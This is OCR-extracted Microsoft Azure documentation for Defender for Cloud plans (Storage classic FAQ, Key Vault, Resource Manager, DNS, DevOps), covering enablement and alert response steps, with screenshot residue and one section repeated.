The new plan offers a more comprehensive feature set designed to better protect your 
data. It also provides a more predictable pricing plan compared to the classic plan. We 
recommend you migrate to the new plan to take full advantage of its benefits. 


Learn more about how to enable and configure Defender for Storage. 


Next steps 


In this article, you learned about migrating to the new Microsoft Defender for Storage 
plan. 


Enable Defender for Storage 


Common questions about 
Defender for Storage classic 


FAQ 


Get answers to common questions about Microsoft Defender for Storage classic. 


Are there differences in features 
between the new Defender for Storage 
plan and the legacy Defender for 
Storage Classic plan? 


Yes. The new Defender for Storage plan offers additional security capabilities, such as 
near real-time malware scanning and sensitive data threat detection. This plan also 
provides a more predictable pricing structure for better control over coverage and costs. 
Learn more about the benefits of migrating to the new plan. 

How do | estimate charges at the 
account level? 

To get an estimate of Defender for Storage classic costs, use the Price Estimation 
Workbook & in the Azure portal. 

Can | exclude a specific Azure Storage 
account from a protected subscription? 


Yes, you can exclude specific storage accounts from protected subscriptions in Defender 
for Storage (classic). 


Can | switch from the per-transaction 
pricing in Defender for Storage (classic) 
to the new Defender for Storage plan? 


Yes, you can move to the new Defender for Storage plan with per-storage account 
pricing through the Azure portal or other supported methods. This change isn't 
automatic, you'll need to actively make the switch. Learn about how to migrate to the 
new Defender for Storage. 


Can | exclude specific storage accounts 
from protection in the new Defender for 
Storage plan? 


Yes, the new Defender for Storage plan with per-storage account pricing allows you to 
exclude and configure specific storage accounts within protected subscriptions. 
However, you'll need to set up the exclusion again after you migrate to the new plan. 
Learn about how to migrate to the new Defender for Storage. 


Can | switch from an existing per- 
transaction pricing under the Defender 
for Storage (classic) plan to the new 
per-storage account pricing under the 
new Defender for Storage plan? 


Yes, you can migrate to the per-storage account pricing under the new Defender for 
Storage plan in the Azure portal or using any of the supported enablement methods. 


Can | return to per-transaction pricing in 
the Defender for Storage (classic) plan 
after switching to per-storage account 
pricing? 


Yes, you can enable per-transaction pricing under the Defender for Storage (classic) plan 
to migrate back from per-storage account pricing using all enablement methods except 
for the Azure portal. 


Will you continue supporting per- 
transaction pricing in the Defender for 
Storage (classic) plan? 

Yes, you can enable per-transaction pricing under the Defender for Storage (classic) plan 
from all the supported enablement methods, except for the Azure portal. 

Under the Defender for Storage (classic) 
per-storage account pricing, can | 
exclude specific storage accounts from 
protections? 


No, you can only enable per-storage account pricing under the Defender for Storage 
(classic) plan at the subscription level. All storage accounts in the subscriptions are 
protected. 

How long does it take for per-storage 
account pricing to be enabled in the 
Defender for Storage (classic) plan? 


When you enable Microsoft Defender for Storage at the subscription level for per- 
storage account or per-transaction pricing under the Defender for Storage (classic) plan, 
it takes up to 24 hours for the plan to be enabled. 


Is there any difference in the feature set 
of per-storage account pricing 
compared to the legacy per-transaction 
pricing in the Defender for Storage 
(classic) plan? 


No. Both per-storage account and per-transaction pricing under the Defender for 
Storage (classic) plan include the same features. The only difference is the pricing 
structure. 


How can | estimate the cost for each 
pricing under the Defender for Storage 
(classic) plan? 


To estimate the cost according to each pricing for your environment under the Defender 
for Storage (classic) plan, we created a pricing estimation workbook “ and a PowerShell 


script that you can run in your environment. 


Next steps 


Learn more about Defender for Storage classic 


Overview of Microsoft Defender for Key 
Vault 


Article e 05/10/2023 


Azure Key Vault is a cloud service that safeguards encryption keys and secrets like 
certificates, connection strings, and passwords. 


Enable Microsoft Defender for Key Vault for Azure-native, advanced threat protection 
for Azure Key Vault, providing an additional layer of security intelligence. 


Availability 


Aspect Details 
Release state: General availability (GA) 
Pricing: Microsoft Defender for Key Vault is billed as shown on the pricing page’ 


Clouds: go Commercial clouds 


* National (Azure Government, Azure China 21Vianet) 


What are the benefits of Microsoft Defender 
for Key Vault? 


Microsoft Defender for Key Vault detects unusual and potentially harmful attempts to 
access or exploit Key Vault accounts. This layer of protection helps you address threats 
even if you're not a security expert, and without the need to manage third-party security 
monitoring systems. 


When anomalous activities occur, Defender for Key Vault shows alerts and optionally 
sends them via email to relevant members of your organization. These alerts include the 
details of the suspicious activity and recommendations on how to investigate and 
remediate threats. 


Microsoft Defender for Key Vault alerts 


When you get an alert from Microsoft Defender for Key Vault, we recommend you 
investigate and respond to the alert as described in Respond to Microsoft Defender for 
Key Vault. Microsoft Defender for Key Vault protects applications and credentials, so 


even if you're familiar with the application or user that triggered the alert, it's important 
to check the situation surrounding every alert. 


The alerts appear in Key Vault's Security page, the Workload protections, and Defender 
for Cloud's security alerts page. 


fa] avskeys | Security ~ x 


vault @ Directory: N 


| E Search (Ctri+/ | ‘ JA Visit Microsoft Defender for Cloud to manage security across your virtual networks, data, apps, and more 
@® Overview 
@ Activity log Recommendations Security alerts E Microsoft Defender for Key Vault On 
E Access control (IAM) 4 oO 0 g 
@ Tags 
@ Diagnose and solve problems ‘ » 
$ Events 
Settings 
Recommendations 

? Keys 
[A Secrets Defender for Cloud continuously monitors the Azure Key Vaults in your environment to identify security vulnerabilities 

B - and recommends actions to mitigate them in order to reduce the attack surface and increase security posture. 
=! Certificates 

Access policies Description Ty Severity ZO 

<l> Networking Diagnostic logs in Key Vault should be enabled O Low 
0 Security Firewall should be enabled on Key Vault A Medium 
II Properties Key vaults should have purge protection enabled A Medium 
A Locks Private endpoint should be configured for Key Vault A Medium 
Monitoring ZZ View additional recommendations in Defender for Cloud > 
B Alerts 


d Metrics 
E Diagnostic settings 
SE Logs 


Insights Defender for Cloud uses advanced security analytics and threat intelligence to alert you on suspicious activities in your 
Azure Key Vaults that potentially malicious. Security alerts displayed below are from the past 21 days. 


Security incidents and alerts 


a Workbooks 
Q Check for Microsoft Defender Alerts on this resource in Microsoft Defender for Cloud > 


Ọ Tip 


You can simulate Microsoft Defender for Key Vault alerts by following the 
instructions in Validating Azure Key Vault threat detection in Microsoft Defender 
for Cloud Z. 


Respond to Microsoft Defender for Key Vault 
alerts 


When you receive an alert from Microsoft Defender for Key Vault, we recommend you 


investigate and respond to the alert as described below. Microsoft Defender for Key 
Vault protects applications and credentials, so even if you're familiar with the application 


or user that triggered the alert, it's important to verify the situation surrounding every 
alert. 


Alerts from Microsoft Defender for Key Vault includes these elements: 


e Object ID 
e User Principal Name or IP address of the suspicious resource 


Depending on the type of access that occurred, some fields might not be available. For 
example, if your key vault was accessed by an application, you won't see an associated 
User Principal Name. If the traffic originated from outside of Azure, you won't see an 
Object ID. 


Q Tip 


Azure virtual machines are assigned Microsoft IPs. This means that an alert might 
contain a Microsoft IP even though it relates to activity performed from outside of 
Microsoft. So even if an alert has a Microsoft IP, you should still investigate as 
described on this page. 


Step 1. Identify the source 


1. Verify whether the traffic originated from within your Azure tenant. If the key vault 
firewall is enabled, it's likely that you've provided access to the user or application 
that triggered this alert. 

2. If you can't verify the source of the traffic, continue to Step 2. Respond accordingly. 

3. If you can identify the source of the traffic in your tenant, contact the user or 
owner of the application. 


® Caution 


Microsoft Defender for Key Vault is designed to help identify suspicious activity 
caused by stolen credentials. Don't dismiss the alert simply because you recognize 
the user or application. Contact the owner of the application or the user and verify 
the activity was legitimate. You can create a suppression rule to eliminate noise if 
necessary. Learn more in Suppress security alerts. 


Step 2. Respond accordingly 


If you don't recognize the user or application, or if you think the access shouldn't have 
been authorized: 


e If the traffic came from an unrecognized IP Address: 


1. Enable the Azure Key Vault firewall as described in Configure Azure Key Vault 
firewalls and virtual networks. 


2. Configure the firewall with trusted resources and virtual networks. 
e I the source of the alert was an unauthorized application or suspicious user: 


1. Open the key vault's access policy settings. 
2. Remove the corresponding security principal, or restrict the operations the 
security principal can perform. 


e If the source of the alert has an Azure Active Directory role in your tenant: 


1. Contact your administrator. 
2. Determine whether there's a need to reduce or revoke Azure Active Directory 


permissions. 


Step 3. Measure the impact 


When the event has been mitigated, investigate the secrets in your key vault that were 
affected: 


1. Open the Security page on your Azure key vault and view the triggered alert. 

2. Select the specific alert that was triggered and review the list of the secrets that 
were accessed and the timestamp. 

3. Optionally, if you have key vault diagnostic logs enabled, review the previous 
operations for the corresponding caller IP, user principal, or object ID. 


Step 4. Take action 


When you've compiled your list of the secrets, keys, and certificates that were accessed 
by the suspicious user or application, you should rotate those objects immediately. 


1. Affected secrets should be disabled or deleted from your key vault. 
2. If the credentials were used for a specific application: 
a. Contact the administrator of the application and ask them to audit their 
environment for any uses of the compromised credentials since they were 


compromised. 


b. If the compromised credentials were used, the application owner should identify 
the information that was accessed and mitigate the impact. 


Next steps 
In this article, you learned about Microsoft Defender for Key Vault. 
For related material, see the following articles: 


e Key Vault security alerts--The Key Vault section of the reference table for all 
Microsoft Defender for Cloud alerts 

e Continuously export Defender for Cloud data 

e Suppress security alerts 


Protect your key vaults with Defender 
for Key Vault 


Article e 07/05/2023 


Azure Key Vault is a cloud service that safeguards encryption keys and secrets like 
certificates, connection strings, and passwords. 


Enable Microsoft Defender for Key Vault for Azure-native, advanced threat protection for 
Azure Key Vault, providing an additional layer of security intelligence. 


Learn more about Microsoft Defender for Key Vault. 


You can learn more about Defender for Key Vault's pricing on the pricing page”. 


Prerequisites 


e You need a Microsoft Azure subscription. If you don't have an Azure subscription, 
you can sign up for a free subscription”. 


e You must enable Microsoft Defender for Cloud on your Azure subscription. 


Enable the Key Vault plan 


Microsoft Defender for Key Vault detects unusual and potentially harmful attempts to 
access or exploit Key Vault accounts. This layer of protection helps you address threats 
even if you're not a security expert, and without the need to manage third-party security 


monitoring systems. 
To enable Defender for Key Vault plan on your subscription: 
1. Sign in to the Azure portal £. 
2. Search for and select Microsoft Defender for Cloud. 
3. In the Defender for Cloud menu, select Environment settings. 
4. Select the relevant subscription. 


5. On the Defender plans page, toggle the Key Vault plan to On. 


Home > Microsoft Defender for Coud | Environment settin 


e Settings | Defender plans 
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When you select Save, Microsoft Defender for Cloud's enhanced security features will be enabled on all the resource types you've selected. The first 30 days are free. 
For more information on Defender for Cloud pricing, visit the pricing page. 


6. Select Save. 


Next steps 


Overview of Microsoft Defender for Key Vault 


Status 


Overview of Microsoft Defender for Key 
Vault 


Article e 05/10/2023 


Azure Key Vault is a cloud service that safeguards encryption keys and secrets like 
certificates, connection strings, and passwords. 


Enable Microsoft Defender for Key Vault for Azure-native, advanced threat protection 
for Azure Key Vault, providing an additional layer of security intelligence. 


Availability 


Aspect Details 
Release state: General availability (GA) 
Pricing: Microsoft Defender for Key Vault is billed as shown on the pricing page’ 


Clouds: go Commercial clouds 


* National (Azure Government, Azure China 21Vianet) 


What are the benefits of Microsoft Defender 
for Key Vault? 


Microsoft Defender for Key Vault detects unusual and potentially harmful attempts to 
access or exploit Key Vault accounts. This layer of protection helps you address threats 
even if you're not a security expert, and without the need to manage third-party security 
monitoring systems. 


When anomalous activities occur, Defender for Key Vault shows alerts and optionally 
sends them via email to relevant members of your organization. These alerts include the 
details of the suspicious activity and recommendations on how to investigate and 
remediate threats. 


Microsoft Defender for Key Vault alerts 


When you get an alert from Microsoft Defender for Key Vault, we recommend you 
investigate and respond to the alert as described in Respond to Microsoft Defender for 
Key Vault. Microsoft Defender for Key Vault protects applications and credentials, so 


even if you're familiar with the application or user that triggered the alert, it's important 
to check the situation surrounding every alert. 


The alerts appear in Key Vault's Security page, the Workload protections, and Defender 
for Cloud's security alerts page. 


fa] avskeys | Security ~ x 


vault @ Directory: N 


| E Search (Ctri+/ | ‘ JA Visit Microsoft Defender for Cloud to manage security across your virtual networks, data, apps, and more 
@® Overview 
@ Activity log Recommendations Security alerts E Microsoft Defender for Key Vault On 
E Access control (IAM) 4 oO 0 g 
@ Tags 
@ Diagnose and solve problems ‘ » 
$ Events 
Settings 
Recommendations 

? Keys 
[A Secrets Defender for Cloud continuously monitors the Azure Key Vaults in your environment to identify security vulnerabilities 

B - and recommends actions to mitigate them in order to reduce the attack surface and increase security posture. 
=! Certificates 

Access policies Description Ty Severity ZO 

<l> Networking Diagnostic logs in Key Vault should be enabled O Low 
0 Security Firewall should be enabled on Key Vault A Medium 
II Properties Key vaults should have purge protection enabled A Medium 
A Locks Private endpoint should be configured for Key Vault A Medium 
Monitoring ZZ View additional recommendations in Defender for Cloud > 
B Alerts 


d Metrics 
E Diagnostic settings 
SE Logs 


Insights Defender for Cloud uses advanced security analytics and threat intelligence to alert you on suspicious activities in your 
Azure Key Vaults that potentially malicious. Security alerts displayed below are from the past 21 days. 


Security incidents and alerts 


a Workbooks 
Q Check for Microsoft Defender Alerts on this resource in Microsoft Defender for Cloud > 


Ọ Tip 


You can simulate Microsoft Defender for Key Vault alerts by following the 
instructions in Validating Azure Key Vault threat detection in Microsoft Defender 
for Cloud Z. 


Respond to Microsoft Defender for Key Vault 
alerts 


When you receive an alert from Microsoft Defender for Key Vault, we recommend you 


investigate and respond to the alert as described below. Microsoft Defender for Key 
Vault protects applications and credentials, so even if you're familiar with the application 


or user that triggered the alert, it's important to verify the situation surrounding every 
alert. 


Alerts from Microsoft Defender for Key Vault includes these elements: 


e Object ID 
e User Principal Name or IP address of the suspicious resource 


Depending on the type of access that occurred, some fields might not be available. For 
example, if your key vault was accessed by an application, you won't see an associated 
User Principal Name. If the traffic originated from outside of Azure, you won't see an 
Object ID. 


Q Tip 


Azure virtual machines are assigned Microsoft IPs. This means that an alert might 
contain a Microsoft IP even though it relates to activity performed from outside of 
Microsoft. So even if an alert has a Microsoft IP, you should still investigate as 
described on this page. 


Step 1. Identify the source 


1. Verify whether the traffic originated from within your Azure tenant. If the key vault 
firewall is enabled, it's likely that you've provided access to the user or application 
that triggered this alert. 

2. If you can't verify the source of the traffic, continue to Step 2. Respond accordingly. 

3. If you can identify the source of the traffic in your tenant, contact the user or 
owner of the application. 


® Caution 


Microsoft Defender for Key Vault is designed to help identify suspicious activity 
caused by stolen credentials. Don't dismiss the alert simply because you recognize 
the user or application. Contact the owner of the application or the user and verify 
the activity was legitimate. You can create a suppression rule to eliminate noise if 
necessary. Learn more in Suppress security alerts. 


Step 2. Respond accordingly 


If you don't recognize the user or application, or if you think the access shouldn't have 
been authorized: 


e If the traffic came from an unrecognized IP Address: 


1. Enable the Azure Key Vault firewall as described in Configure Azure Key Vault 
firewalls and virtual networks. 


2. Configure the firewall with trusted resources and virtual networks. 
e I the source of the alert was an unauthorized application or suspicious user: 


1. Open the key vault's access policy settings. 
2. Remove the corresponding security principal, or restrict the operations the 
security principal can perform. 


e If the source of the alert has an Azure Active Directory role in your tenant: 


1. Contact your administrator. 
2. Determine whether there's a need to reduce or revoke Azure Active Directory 


permissions. 


Step 3. Measure the impact 


When the event has been mitigated, investigate the secrets in your key vault that were 
affected: 


1. Open the Security page on your Azure key vault and view the triggered alert. 

2. Select the specific alert that was triggered and review the list of the secrets that 
were accessed and the timestamp. 

3. Optionally, if you have key vault diagnostic logs enabled, review the previous 
operations for the corresponding caller IP, user principal, or object ID. 


Step 4. Take action 


When you've compiled your list of the secrets, keys, and certificates that were accessed 
by the suspicious user or application, you should rotate those objects immediately. 


1. Affected secrets should be disabled or deleted from your key vault. 
2. If the credentials were used for a specific application: 
a. Contact the administrator of the application and ask them to audit their 
environment for any uses of the compromised credentials since they were 


compromised. 


b. If the compromised credentials were used, the application owner should identify 
the information that was accessed and mitigate the impact. 


Next steps 
In this article, you learned about Microsoft Defender for Key Vault. 
For related material, see the following articles: 


e Key Vault security alerts--The Key Vault section of the reference table for all 
Microsoft Defender for Cloud alerts 

e Continuously export Defender for Cloud data 

e Suppress security alerts 


Overview of Microsoft Defender for 
Resource Manager 


Article e 08/03/2023 


Azure Resource Manager is the deployment and management service for Azure. It 
provides a management layer that enables you to create, update, and delete resources 
in your Azure account. You use management features, like access control, locks, and 
tags, to secure and organize your resources after deployment. 


The cloud management layer is a crucial service connected to all your cloud resources. 
Because of this, it is also a potential target for attackers. Consequently, we recommend 
security operations teams monitor the resource management layer closely. 


Microsoft Defender for Resource Manager automatically monitors the resource 
management operations in your organization, whether they're performed through the 
Azure portal, Azure REST APIs, Azure CLI, or other Azure programmatic clients. Defender 
for Cloud runs advanced security analytics to detect threats and alerts you about 
suspicious activity. 


Availability 


Aspect Details 

Release General availability (GA) 

state: 

Pricing: Microsoft Defender for Resource Manager is billed as shown on the pricing page Z 
Clouds: Lv] Commercial clouds 


Lv] Azure Government 
(v) Microsoft Azure operated by 21Vianet 


What are the benefits of Microsoft Defender 
for Resource Manager? 


Microsoft Defender for Resource Manager protects against issues including: 


e Suspicious resource management operations, such as operations from malicious 
IP addresses, disabling antimalware, and suspicious scripts running in VM 
extensions 


e Use of exploitation toolkits like Microburst or PowerZure 


e Lateral movement from the Azure management layer to the Azure resources data 


plane 
Azure portal Azure PowerShell Azure CLI REST clients 
SDKs 
4 
D (*) Azure Resource Manager Authentication 

= OX D| 
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Data Web App Virtual Service Other 

Store Machine Management services 


A full list of the alerts provided by Microsoft Defender for Resource Manager is on the 
alerts reference page. 


Next steps 


In this article, you learned about Microsoft Defender for Resource Manager. 


Enable enhanced protections 


For related material, see the following article: 


e Security alerts might be generated or received by Defender for Cloud from 
different security products. To export all of these alerts to Microsoft Sentinel, any 
third-party SIEM, or any other external tool, follow the instructions in Exporting 
alerts to a SIEM solution. 


Protect your resources with Defender 
for Resource Manager 
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Azure Resource Manager is the deployment and management service for Azure. It 
provides a management layer that enables you to create, update, and delete resources 
in your Azure account. You use management features, like access control, locks, and 


tags, to secure and organize your resources after deployment. 


Microsoft Defender for Resource Manager automatically monitors the resource 
management operations in your organization, whether they're performed through the 
Azure portal, Azure REST APIs, Azure CLI, or other Azure programmatic clients. Defender 
for Cloud runs advanced security analytics to detect threats and alerts you about 
suspicious activity. 


Learn more about Microsoft Defender for Resource Manager. 


You can learn more about Defender for Resource Manager's pricing on the pricing 
page”. 


Prerequisites 


e You need a Microsoft Azure subscription. If you don't have an Azure subscription, 
you can sign up for a free subscription”. 


e You must enable Microsoft Defender for Cloud on your Azure subscription. 


Enable the Resource Manager plan 


Microsoft Defender for Resource Manager automatically monitors the resource 
management operations in your organization, whether they're performed through the 
Azure portal, Azure REST APIs, Azure CLI, or other Azure programmatic clients. Defender 
for Cloud runs advanced security analytics to detect threats and alerts you about 
suspicious activity. 


To enable the Defender for Resource Manager plan on your subscription: 
1. Sign in to the Azure portal Z. 


2. Search for and select Microsoft Defender for Cloud. 


3. In the Defender for Cloud menu, select Environment settings. 
4. Select the relevant subscription. 


5. On the Defender plans page, toggle the Resource Manager plan to On. 
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When you select Save, Microsoft Defender for Cloud's enhanced security features will be enabled on all the resource types you've selected, The first 30 days are free. 
For more information on Defender for Cloud pricing, visit the pricing pag: 


6. Select Save. 


Next steps 


Overview of Microsoft Defender for Resource Manager 


Respond to Microsoft Defender for 
Resource Manager alerts 
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When you receive an alert from Microsoft Defender for Resource Manager, we 
recommend you investigate and respond to the alert as described below. Defender for 
Resource Manager protects all connected resources, so even if you're familiar with the 
application or user that triggered the alert, it's important to verify the situation 


surrounding every alert. 


Step 1: Contact 


1. Contact the resource owner to determine whether the behavior was expected or 
intentional. 

2. If the activity is expected, dismiss the alert. 

3. If the activity is unexpected, treat the related user accounts, subscriptions, and 
virtual machines as compromised and mitigate as described in the following step. 


Step 2: Investigate alerts from Microsoft 
Defender for Resource Manager 


Security alerts from Defender for Resource Manager are based on threats detected by 
monitoring Azure Resource Manager operations. Defender for Cloud uses internal log 
sources of Azure Resource Manager as well as Azure Activity log, a platform log in Azure 
that provides insight into subscription-level events. 


Defender for Resource Manager provides visibility into activity that comes from third 
party service providers that have delegated access as part of the resource manager 
alerts. For example, Azure Resource Manager operation from suspicious proxy IP 


address - delegated access. 


Delegated access refers to access with Azure Lighthouse or with Delegated 


administration privileges. 


Alerts that show Delegated access also include a customized description and 


remediation steps. 


Learn more about Azure Activity log. 


To investigate security alerts from Defender for Resource Manager: 


1. Open Azure Activity log. 


Microsoft Azure Ø activity log x 


Dashboard > 


Services 
SO O Microsoft Defender for Cloud | ( E Activity log 
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E Ọ Overview e ganay p 
(a) ba Operation log (classic) 


@ Getting started 


2. Filter the events to: 


e The subscription mentioned in the alert 
e The timeframe of the detected activity 


e The related user account (if relevant) 


3. Look for suspicious activities. 


Q Tip 


For a better, richer investigation experience, stream your Azure activity logs to 
Microsoft Sentinel as described in Connect data from Azure Activity log. 


Step 3: Immediate mitigation 
1. Remediate compromised user accounts: 


e If they're unfamiliar, delete them as they may have been created by a threat 
actor 

e If they're familiar, change their authentication credentials 

e Use Azure Activity Logs to review all activities performed by the user and 
identify any that are suspicious 


2. Remediate compromised subscriptions: 


e Remove any unfamiliar Runbooks from the compromised automation 
account 


e Review IAM permissions for the subscription and remove permissions for any 
unfamiliar user account 

e Review all Azure resources in the subscription and delete any that are 
unfamiliar 

e Review and investigate any security alerts for the subscription in Microsoft 
Defender for Cloud 

e Use Azure Activity Logs to review all activities performed in the subscription 
and identify any that are suspicious 


3. Remediate the compromised virtual machines 


e Change the passwords for all users 
e Runa full antimalware scan on the machine 


e Reimage the machines from a malware-free source 


Next steps 


This page explained the process of responding to an alert from Defender for Resource 
Manager. For related information, see the following pages: 


e Overview of Microsoft Defender for Resource Manager 
e Suppress security alerts 
e Continuously export Defender for Cloud data 


Overview of Microsoft Defender for 
DNS 
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© Important 


As of August 1, customers with an existing subscription to Defender for DNS can 
continue to use the service, but new subscribers will receive alerts about suspicious 


DNS activity as part of Defender for Servers P2. 
Microsoft Defender for DNS provides an additional layer of protection for resources that 
use Azure DNS's Azure-provided name resolution capability. 


From within Azure DNS, Defender for DNS monitors the queries from these resources 
and detects suspicious activities without the need for any additional agents on your 


resources. 


Availability 


Aspect Details 

Release state: General availability (GA) 

Pricing: Microsoft Defender for DNS is billed as shown on the pricing page Z 
Clouds: @ commercial clouds 


@ microsoft Azure operated by 21Vianet 
EG Azure Government 


What are the benefits of Microsoft Defender 
for DNS? 


Microsoft Defender for DNS detects suspicious and anomalous activities such as: 


e Data exfiltration from your Azure resources using DNS tunneling 

e Malware communicating with command and control servers 

e DNS attacks - communication with malicious DNS resolvers 

e Communication with domains used for malicious activities such as phishing and 


crypto mining 


A full list of the alerts provided by Microsoft Defender for DNS is on the alerts reference 


page. 


Dependencies 


Microsoft Defender for DNS doesn't use any agents. 


Next steps 
In this article, you learned about Microsoft Defender for DNS. 
For related material, see the following article: 


Security alerts might be generated by Defender for Cloud or received from other 
security products. To export all of these alerts to Microsoft Sentinel, any third-party 
SIEM, or any other external tool, follow the instructions in Exporting alerts to a SIEM. 


Respond to Microsoft Defender for DNS 
alerts 
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© Important 


As of August 1, customers with an existing subscription to Defender for DNS can 
continue to use the service, but new subscribers will receive alerts about suspicious 
DNS activity as part of Defender for Servers P2. 


When you receive a security alert about suspicious and anomalous activities identified in 
DNS transactions, we recommend you investigate and respond to the alert as described 
below. Even if you're familiar with the application or user that triggered the alert, it's 
important to verify the situation surrounding every alert. 


Step 1. Contact 


1. Contact the resource owner to determine whether the behavior was expected or 
intentional. 

2. If the activity is expected, dismiss the alert. 

3. If the activity is unexpected, treat the resource as potentially compromised and 
mitigate as described in the next step. 


Step 2. Immediate mitigation 


1. Isolate the resource from the network to prevent lateral movement. 

2. Run a full antimalware scan on the resource, following any resulting remediation 
advice. 

3. Review installed and running software on the resource, removing any unknown or 
unwanted packages. 

4. Revert the machine to a known good state, reinstalling the operating system if 
required, and restore software from a verified malware-free source. 

5. Resolve any Microsoft Defender for Cloud recommendations for the machine, 
remediating highlighted security issues to prevent future breaches. 


Next steps 


Now that you know how to respond to DNS alerts, find out more about how to manage 
alerts. 


Manage security alerts 


For related material, see the following articles: 


e To export Defender for Cloud alerts to your centralized security information and 
event management (SIEM) system, such as Microsoft Sentinel, any third-party 
SIEM, or any other external tool. 

e To send alerts in real-time to Log Analytics or Event Hubs to create automated 
processes to analyze and respond to security alerts. 


Overview of Defender for DevOps 
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@ Important 


Microsoft Defender for DevOps is constantly making changes and updates that 
require Defender for DevOps customers who have onboarded their GitHub 
environments in Defender for Cloud to provide permissions as part of the 
application deployed in their GitHub organization. These permissions are necessary 
to ensure all of the security features of Defender for DevOps operate normally and 
without issues. 


Please see the recent release note for instructions on how to add these additional 
permissions. 


Microsoft Defender for Cloud enables comprehensive visibility, posture management, 
and threat protection across multicloud environments including Azure, AWS, GCP, and 
on-premises resources. Defender for DevOps, a service available in Defender for Cloud, 
empowers security teams to manage DevOps security across multi-pipeline 
environments. 


Defender for DevOps uses a central console to empower security teams with the ability 
to protect applications and resources from code to cloud across multi-pipeline 
environments, such as GitHub and Azure DevOps. Findings from Defender for DevOps 
can then be correlated with other contextual cloud security insights to prioritize 
remediation in code. Key capabilities in Defender for DevOps include: 


e Unified visibility into DevOps security posture: Security administrators now have 
full visibility into DevOps inventory and the security posture of pre-production 
application code, which includes findings from code, secret, and open-source 
dependency vulnerability scans. They can configure their DevOps resources across 
multi-pipeline and multicloud environments in a single view. 


e Strengthen cloud resource configurations throughout the development lifecycle: 
You can enable security of Infrastructure as Code (laC) templates and container 
images to minimize cloud misconfigurations reaching production environments, 


allowing security administrators to focus on any critical evolving threats. 


e Prioritize remediation of critical issues in code: Apply comprehensive code to 
cloud contextual insights within Defender for Cloud. Security admins can help 
developers prioritize critical code fixes with Pull Request annotations and assign 


developer ownership by triggering custom workflows feeding directly into the 
tools developers use and love. 


Defender for DevOps helps unify, strengthen and manage multi-pipeline DevOps 
security. 


Availability 


Aspect Details 


Release state: Preview 
The Azure Preview Supplemental Terms SZ include other legal terms that 
apply to Azure features that are in beta, preview, or otherwise not yet 
released into general availability. 


Clouds Lv] Commercial clouds 
* National (Azure Government, Microsoft Azure operated by 21Vianet) 


Regions: Australia East, Central US, West Europe 

Source Code Azure DevOps E 

Management GitHub £ supported versions: GitHub Free, Pro, Team, and GitHub 
Systems Enterprise Cloud 

Required 

permissions: Azure account - with permissions to sign into Azure portal. 


Contributor - on the relevant Azure subscription. 
Organization Administrator - in GitHub. 
Security Admin role - in Defender for Cloud. 


Manage your DevOps environments in 
Defender for Cloud 


Defender for DevOps allows you to manage your connected environments and provides 
your security teams with a high level overview of discovered issues that may exist within 
them through the Defender for DevOps console”. 
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Here, you can add GitHub and Azure DevOps environments, customize DevOps 


workbooks to show your desired metrics, view our guides and give feedback, and 


configure your pull request annotations. 


Understanding your DevOps security 


Security Overview 
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Description 


Shows the total number of vulnerabilities found by 
Defender for DevOps. You can organize the results by 
severity level. 


Presents the total number of findings by scan type 
and the associated recommendations for any 
onboarded resources. Selecting a result takes you to 
corresponding recommendations. 
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Review your findings 


The lower half of the page allows you to review onboarded DevOps resources and the 
security information related to them. 
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On this part of the screen you see: 


e Repositories - Lists onboarded repositories from GitHub and Azure DevOps. View 
more information about a specific resource by selecting it. 


e Pull request annotation status - Shows whether PR annotations are enabled for 
the repository. 
o On - PR annotations are enabled. 
o Off - PR annotations aren't enabled. 


o NA - Defender for Cloud doesn't have information about enablement. 


O Note 


Currently, this information is available only for Azure DevOps repositories. 


e Exposed secrets - Shows the number of secrets identified in the repositories. 


e OSS vulnerabilities — Shows the number of open source dependency 
vulnerabilities identified in the repositories. 


O Note 


Currently, this information is available only for GitHub repositories. 


e laC scanning findings — Shows the number of infrastructure as code 
misconfigurations identified in the repositories. 


e Code scanning findings — Shows the number of code vulnerabilities and 
misconfigurations identified in the repositories. 


Learn more 
e You can learn more about DevOps from our DevOps resource center. 
e Learn about security in DevOps. 
e You can learn about securing Azure Pipelines. 


e Learn about security hardening practices for GitHub Actions £. 


Next steps 


Configure the Microsoft Security DevOps GitHub action. 


Configure the Microsoft Security DevOps Azure DevOps extension 


Improve DevOps security posture 
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With an increase of cyber attacks on source code management systems and continuous 
integration/continuous delivery pipelines, securing DevOps platforms against the 
diverse range of threats identified in the DevOps Threat Matrix” is crucial. Such cyber 
attacks can enable code injection, privilege escalation, and data exfiltration, potentially 
leading to extensive impact. 


DevOps posture management is a feature in Microsoft Defender for Cloud that: 


e Provides insights into the security posture of the entire software supply chain 
lifecycle. 

e Uses advanced scanners for in-depth assessments. 

e Covers various resources, from organizations, pipelines, and repositories. 

e Allows customers to reduce their attack surface by uncovering and acting on the 
provided recommendations. 


DevOps scanners 


To provide findings, DevOps posture management uses DevOps scanners to identify 
weaknesses in source code management and continuous integration/continuous 
delivery pipelines by running checks against the security configurations and access 
controls. 


Azure DevOps and GitHub scanners are used internally within Microsoft to identify risks 
associated with DevOps resources, reducing attack surface and strengthening corporate 
DevOps systems. 


Once a DevOps environment is connected, Defender for Cloud autoconfigures these 
scanners to conduct recurring scans every eight hours across multiple DevOps 
resources, including: 


e Builds 

e Secure Files 

e Variable Groups 

e Service Connections 
e Organizations 

e Repositories 


DevOps threat matrix risk reduction 


DevOps posture management assists organizations in discovering and remediating 
harmful misconfigurations in the DevOps platform. This leads to a resilient, zero-trust 
DevOps environment, which is strengthened against a range of threats defined in the 
DevOps threat matrix. The primary posture management controls include: 


e Scoped secret access: Minimize the exposure of sensitive information and reduce 
the risk of unauthorized access, data leaks, and lateral movements by ensuring 
each pipeline only has access to the secrets essential to its function. 


e Restriction of self-hosted runners and high permissions: prevent unauthorized 
executions and potential escalations by avoiding self-hosted runners and ensuring 
that pipeline permissions default to read-only. 


e Enhanced branch protection: Maintain the integrity of the code by enforcing 
branch protection rules and preventing malicious code injections. 


e Optimized permissions and secure repositories: Reduce the risk of unauthorized 
access, modifications by tracking minimum base permissions, and enablement of 
secret push protection” for repositories. 


e Learn more about the DevOps threat matrix”. 


DevOps posture management 
recommendations 


When the DevOps scanners uncover deviations from security best practices within 
source code management systems and continuous integration/continuous delivery 
pipelines, Defender for Cloud outputs precise and actionable recommendations. These 
recommendations have the following benefits: 


e Enhanced visibility: Obtain comprehensive insights into the security posture of 
DevOps environments, ensuring a well-rounded understanding of any existing 
vulnerabilities. Identify missing branch protection rules, privilege escalation risks, 
and insecure connections to prevent attacks. 

e Priority-based action: Filter results by severity to spend resources and efforts more 
effectively by addressing the most critical vulnerabilities first. 

e Attack surface reduction: Address highlighted security gaps to significantly 
